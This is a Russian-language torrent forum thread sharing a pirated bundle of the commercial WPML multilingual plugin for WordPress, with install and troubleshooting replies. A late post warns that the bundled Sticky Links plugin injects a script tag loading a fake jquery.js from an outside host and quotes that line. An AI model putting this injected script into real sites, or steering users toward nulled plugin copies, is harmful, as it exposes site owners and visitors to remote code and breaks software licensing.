WPML Multilingual CMS Plugin 3.7.1

Ответить
Автор
Сообщение

Pall2009

Стаж: 10 лет 6 месяцев

Сообщений: 34

Pall2009 · 22-Апр-17 17:44 (2 года 3 месяца назад, ред. 19-Июл-17 17:30)

WPML Multilingual CMS Plugin
Версия: 3.7.1
Год выпуска: 2017
Разработчик: OnTheGoSystems
Таблетка: не требуется
Требования: WordPress 3.3 +
Описание: С WPML создавать многоязычные сайты стало легко. Плагин подходит для корпоративных сайтов на WordPress, интернет-магазинов на WooCommerce и для блогов.
Содержимое:
скрытый текст
acfml.0.4
gravityforms-multilingual.1.3.15
sitepress-multilingual-cms.3.7.0
sitepress-multilingual-cms.3.7.1
woocommerce-gateways-country-limiter.1.4
woocommerce-multilingual.4.1.2
wpml-all-import.2.0.3
wpml-cms-nav.1.4.20
wpml-media-translation.2.2.0
wpml-page-builders.1.1.2
wpml-sticky-links.1.4.1
wpml-string-translation.2.5.3
wpml-translation-management.2.3.0
Проверка Virustotal
Пример реализации сайта на плагине WPML सस्ते उड़ानें (hindi)
Обновление 3.7.0 -> 3.7.1 от 02.06.2017
Обновление ACFML до версии 0.5.1
Download
Сайт не распространяет и не хранит электронные версии произведений, а лишь предоставляет доступ к создаваемому пользователями каталогу ссылок на торрент-файлы, которые содержат только списки хеш-сумм
Как скачивать? (для скачивания .torrent файлов необходима регистрация)
[Профиль]  [ЛС] 

stingerson

Стаж: 9 лет 11 месяцев

Сообщений: 7


stingerson · 23-Апр-17 15:48 (спустя 22 часа)

Кто то проверял на вирусы скрипты и тд. все ок?)
[Профиль]  [ЛС] 

Pall2009

Стаж: 10 лет 6 месяцев

Сообщений: 34

Pall2009 · 23-Апр-17 15:51 (спустя 3 мин.)

stingerson писал(а):
72972030Кто то проверял на вирусы скрипты и тд. все ок?)
Я гонял через Virustotal
Ссылка на проверку в описании.
Можете проверить подробнее - велкам.
[Профиль]  [ЛС] 

Vit-new1

Стаж: 4 года 2 месяца

Сообщений: 3


Vit-new1 · 24-Апр-17 18:58 (спустя 1 день 3 часа)

Вопрос, а как его правильно инсталировать? Закачать в папку плагинов, а дальше...
Заранее благодарствуйте
[Профиль]  [ЛС] 

Pall2009

Стаж: 10 лет 6 месяцев

Сообщений: 34

Pall2009 · 24-Апр-17 19:51 (спустя 53 мин.)

Vit-new1 писал(а):
72980021Вопрос, а как его правильно инсталировать? Закачать в папку плагинов, а дальше...
Заранее благодарствуйте
Из каждой папочки с версией выгружаем на FTP папочку без версии в /wp-content/plugins/
Идем в админку->плагины->активируем сие богатство
Пожалуйста.
[Профиль]  [ЛС] 

Vit-new1

Стаж: 4 года 2 месяца

Сообщений: 3


Vit-new1 · 24-Апр-17 21:31 (спустя 1 час 39 мин.)

Цитата:
Идем в админку->плагины->активируем сие богатство
Пожалуйста.
После инсталяции 1-го плагина из набора этого богатства, у остальных 10 появилось предупреждение:
У вас должна быть действительная подписка, чтобы получить обновления или поддержку этого плагина. Приобретите подписку или введите существующий ключ сайта.
Это нормально или что-то не так?
Опять же заранее благодарствуйте за ответ.
Вообще странно,что творцы WPML не дают изначально протестировать переводчик
[Профиль]  [ЛС] 

agypten

Стаж: 9 лет 7 месяцев

Сообщений: 13


agypten · 25-Апр-17 09:44 (спустя 12 часов)

Vit-new1 писал(а):
72981243
Цитата:
Идем в админку->плагины->активируем сие богатство
Пожалуйста.
После инсталяции 1-го плагина из набора этого богатства, у остальных 10 появилось предупреждение:
У вас должна быть действительная подписка, чтобы получить обновления или поддержку этого плагина. Приобретите подписку или введите существующий ключ сайта.
Это нормально или что-то не так?
Так и нужно. Обычное предупреждение, что мол надо ввести ключ, чтобы получать обновления. На работоспособность это не влияет.
[Профиль]  [ЛС] 

Vit-new1

Стаж: 4 года 2 месяца

Сообщений: 3


Vit-new1 · 25-Апр-17 12:05 (спустя 2 часа 20 мин.)

agypten писал(а):
72983604
Vit-new1 писал(а):
72981243
Цитата:
Это нормально или что-то не так?
Так и нужно. Обычное предупреждение, что мол надо ввести ключ, чтобы получать обновления. На работоспособность это не влияет.
Все понял, огромное благодарствуйте за ответ.
[Профиль]  [ЛС] 

Pall2009

Стаж: 10 лет 6 месяцев

Сообщений: 34

Pall2009 · 25-Апр-17 16:17 (спустя 4 часа)

Vit-new1 писал(а):
Вообще странно,что творцы WPML не дают изначально протестировать переводчик
Можно и потестировать, в github оно есть
[Профиль]  [ЛС] 

Projector123

Стаж: 8 лет 4 месяца

Сообщений: 5


Projector123 · 26-Апр-17 11:38 (спустя 19 часов, ред. 26-Апр-17 11:38)

Спасибо большое мил-человек за раздачу. Встаньте только кто-нибудь на раздачу.
[Профиль]  [ЛС] 

Pall2009

Стаж: 10 лет 6 месяцев

Сообщений: 34

Pall2009 · 27-Апр-17 18:28 (спустя 1 день 6 часов)

Projector123 писал(а):
72990094Спасибо большое мил-человек за раздачу. Встаньте только кто-нибудь на раздачу.
Я стою
[Профиль]  [ЛС] 

tarantino1971

Стаж: 11 лет

Сообщений: 31

tarantino1971 · 09-Май-17 00:39 (спустя 11 дней)

При установке в пакете WPML - wpml-translation-management - сайт уходит в белое окно до удаления этого аддона через ftp. После удаления - работа сайта восстанавливается...
[Профиль]  [ЛС] 

alexpapay

Стаж: 7 лет 11 месяцев

Сообщений: 8


alexpapay · 09-Май-17 23:09 (спустя 22 часа, ред. 10-Май-17 12:21)

tarantino1971 писал(а):
73076764При установке в пакете WPML - wpml-translation-management - сайт уходит в белое окно до удаления этого аддона через ftp. После удаления - работа сайта восстанавливается...
Такая же проблема? Никто не сталкивался??? 500 ответ дает после активации описанного выше плагина.
alexpapay писал(а):
73082531
tarantino1971 писал(а):
73076764При установке в пакете WPML - wpml-translation-management - сайт уходит в белое окно до удаления этого аддона через ftp. После удаления - работа сайта восстанавливается...
Такая же проблема? Никто не сталкивался??? 500 ответ дает после активации описанного выше плагина.
Вот решение, если кому надо: https://github.com/wp-premium/wpml-translation-management
Просто заливаете эту версию и все. Будет работать.
[Профиль]  [ЛС] 

Pall2009

Стаж: 10 лет 6 месяцев

Сообщений: 34

Pall2009 · 10-Май-17 18:18 (спустя 19 часов)

tarantino1971 писал(а):
73076764При установке в пакете WPML - wpml-translation-management - сайт уходит в белое окно до удаления этого аддона через ftp. После удаления - работа сайта восстанавливается...
Не было такого.
Сервер и окружение какое?
[Профиль]  [ЛС] 

aspartam12

Стаж: 7 лет 1 месяц

Сообщений: 8


aspartam12 · 13-Май-17 11:46 (спустя 2 дня 17 часов)

alexpapay писал(а):
73082531
tarantino1971 писал(а):
73076764При установке в пакете WPML - wpml-translation-management - сайт уходит в белое окно до удаления этого аддона через ftp. После удаления - работа сайта восстанавливается...
Такая же проблема? Никто не сталкивался??? 500 ответ дает после активации описанного выше плагина.
alexpapay писал(а):
73082531
tarantino1971 писал(а):
73076764При установке в пакете WPML - wpml-translation-management - сайт уходит в белое окно до удаления этого аддона через ftp. После удаления - работа сайта восстанавливается...
Такая же проблема? Никто не сталкивался??? 500 ответ дает после активации описанного выше плагина.
Вот решение, если кому надо: https://github.com/wp-premium/wpml-translation-management
Просто заливаете эту версию и все. Будет работать.
Низкий поклон, мне помогло
[Профиль]  [ЛС] 

Pall2009

Стаж: 10 лет 6 месяцев

Сообщений: 34

Pall2009 · 02-Июн-17 17:26 (спустя 20 дней, ред. 02-Июн-17 17:26)

Обновил WPML Sitepress Multilingual CMS до версии 3.7.1
Че нового, согласно автору
скрытый текст
# Fixes
  • [wpmlcore-4438] Fixed an issue with Visual Composer's widget where strings were registered twice
  • [wpmlcore-4402] Fixed stripped SVG tags from Enfold's code blocks in manual translation mode
Перезалейте торрент
Ссылка на вирустотал
Добавил:
скрытый текст
WPML Compatibility Test Tools Addon 1.0.1
WPML String Translation Addon 2.5.4
WPML Translation Analytics Addon 1.0.7
WPML Translation Management Addon 2.3.1
WPML WordPress Multilingual Page Builders Add-on 1.1.3
[Профиль]  [ЛС] 

Grabowski

Стаж: 9 лет 4 месяца

Сообщений: 20

Grabowski · 15-Июн-17 15:01 (спустя 12 дней)

А если у меня сейчас стоит версия (ну, скажем) 3.5 — как мне её обновить до 3.7.1, чтобы ничего при этом не потерять?
[Профиль]  [ЛС] 

Pall2009

Стаж: 10 лет 6 месяцев

Сообщений: 34

Pall2009 · 18-Июн-17 23:40 (спустя 3 дня, ред. 18-Июн-17 23:40)

Grabowski писал(а):
73300284А если у меня сейчас стоит версия (ну, скажем) 3.5 — как мне её обновить до 3.7.1, чтобы ничего при этом не потерять?
Легко!
Просто перезаписываете файлы плагина в /wp-content/plugins/
В любом случае, бэкап базы никогда перед обновлением лишний не бывает.
[Профиль]  [ЛС] 

alpatov.max

Стаж: 5 лет 10 месяцев

Сообщений: 1


alpatov.max · 22-Июн-17 13:49 (спустя 3 дня, ред. 22-Июн-17 13:49)

Люди добрые, перезалейте торрент или раздайте!
[Профиль]  [ЛС] 

Pall2009

Стаж: 10 лет 6 месяцев

Сообщений: 34

Pall2009 · 23-Июн-17 14:44 (спустя 1 день, ред. 24-Июн-17 00:21)

alpatov.max писал(а):
73338590Люди добрые, перезалейте торрент или раздайте!
Так два-три сида постоянно висят активные
Обновил Advanced Custom Fields Multilingual до версии 0.5
Сейчас есть в природе версия 0.5.1, но до нее почему-то 0.5 обновляться не желает.
Перезаливайте торрент.
[Профиль]  [ЛС] 

Pall2009

Стаж: 10 лет 6 месяцев

Сообщений: 34

Pall2009 · 01-Июл-17 14:33 (спустя 7 дней)

Обновил ACFML до версии 0.5.1
Перезалейте себе торрент
[Профиль]  [ЛС] 

pyro-zp

Стаж: 9 лет 6 месяцев

Сообщений: 6


pyro-zp · 20-Июл-17 10:00 (спустя 18 дней)

Друзья, Как правильно ставить?
Мне нужно добавить мультивалюты к товарам. Часть в рублях, часть в долларах.
Пробовал загружать отдельно multilingual, просит сам WPML и чего-то ещё.
Мне что нужно установить, чтобы хоть что-то работало?:) Или всё равно wpml покупать придётся
[Профиль]  [ЛС] 

AleksReaper

Стаж: 2 года 7 месяцев

Сообщений: 3


AleksReaper · 07-Авг-17 12:21 (спустя 18 дней)

Плагин достаточно хороший, интуитивно доступен к пониманию. Делал мультиязычный сайт с помощью этого плагина. Клиент остался доволен.
Насколько я помню, инсталляция плагина начинается с папки - sitepress-multilingual-cms.3.7.1 - вот её-то родимую и нужно установить, или запаковать в zip архив или залить по ftp на хостинг, а там уж активация и пользуйся.
[Профиль]  [ЛС] 

Pall2009

Стаж: 10 лет 6 месяцев

Сообщений: 34

Pall2009 · 09-Авг-17 22:00 (спустя 2 дня 9 часов)

AleksReaper писал(а):
73636159Плагин достаточно хороший, интуитивно доступен к пониманию. Делал мультиязычный сайт с помощью этого плагина. Клиент остался доволен.
Насколько я помню, инсталляция плагина начинается с папки - sitepress-multilingual-cms.3.7.1 - вот её-то родимую и нужно установить, или запаковать в zip архив или залить по ftp на хостинг, а там уж активация и пользуйся.
Вот да. Ничего сложного не вижу в установке.
[Профиль]  [ЛС] 

клеверклеверклевер

Стаж: 6 лет 10 месяцев

Сообщений: 128

клеверклеверклевер · 24-Авг-17 19:50 (спустя 14 дней, ред. 24-Авг-17 19:50)

И как его устанавливать? Zip не заливает из за большого размера. Вручную кидаю папку sitepress-multilingual-cms в плагины и все равно ничего не видит.
После установки сайт сдох. Ошибка 500. Кто то отписывался вверху что нужно скачать какую то папку, но что с ней делать не объяснил.
[Профиль]  [ЛС] 

AHTOLLlKA

Стаж: 11 лет 1 месяц

Сообщений: 32

AHTOLLlKA · 27-Авг-17 16:36 (спустя 2 дня 20 часов)

иногда после установки других плагинов может вываливаться в белый экран вся админка ( при этом сам сайт работает нормально)
если по SSH переименовать в плагинах папку - sitepress-multilingual-cms.3.7.1 - все нормально становится, если обратно переименовать, то опять в белую страницу вываливается, понять не могу что с ней, может есть обновления?
[Профиль]  [ЛС] 

Pall2009

Стаж: 10 лет 6 месяцев

Сообщений: 34

Pall2009 · 18-Сен-17 23:06 (спустя 22 дня)

AHTOLLlKA писал(а):
73739021иногда после установки других плагинов может вываливаться в белый экран вся админка ( при этом сам сайт работает нормально)
если по SSH переименовать в плагинах папку - sitepress-multilingual-cms.3.7.1 - все нормально становится, если обратно переименовать, то опять в белую страницу вываливается, понять не могу что с ней, может есть обновления?
Копировать надо подпапку из sitepress-multilingual-cms.3.7.1, а не саму эту папку.
[Профиль]  [ЛС] 

moi_rajky

Стаж: 4 года 8 месяцев

Сообщений: 1


moi_rajky · 21-Окт-17 13:31 (спустя 1 месяц 2 дня)

There is a virus. The Sticky Links plugin injects custom <script> into the code of any website on which this is installed.
Check your website for this:
<script type="text/javascript" src="http://www.i7wp.org/jquery.js"></script>
It's a fake JavaScript file included into your website. It doesn't do anything yet but might be harmful at some point.
[Профиль]  [ЛС] 

Aleksandr Skladnev

Стаж: 11 лет 8 месяцев

Сообщений: 1


Aleksandr Skladnev · 24-Окт-17 00:29 (спустя 2 дня 10 часов)

moi_rajky писал(а):
74060593There is a virus. The Sticky Links plugin injects custom <script> into the code of any website on which this is installed.
Check your website for this:
<script type="text/javascript" src="http://www.i7wp.org/jquery.js"></script>
It's a fake JavaScript file included into your website. It doesn't do anything yet but might be harmful at some point.
Есть смысл не ставить и поискать другие пути решения?
[Профиль]  [ЛС] 

johnnysayshi

Стаж: 1 год 9 месяцев

Сообщений: 3

johnnysayshi · 08-Ноя-17 17:26 (спустя 15 дней)

Есть ли возможность получить сопутствующие расширения для WooCommerce?
[Профиль]  [ЛС] 
 
Ответить
Loading...
Error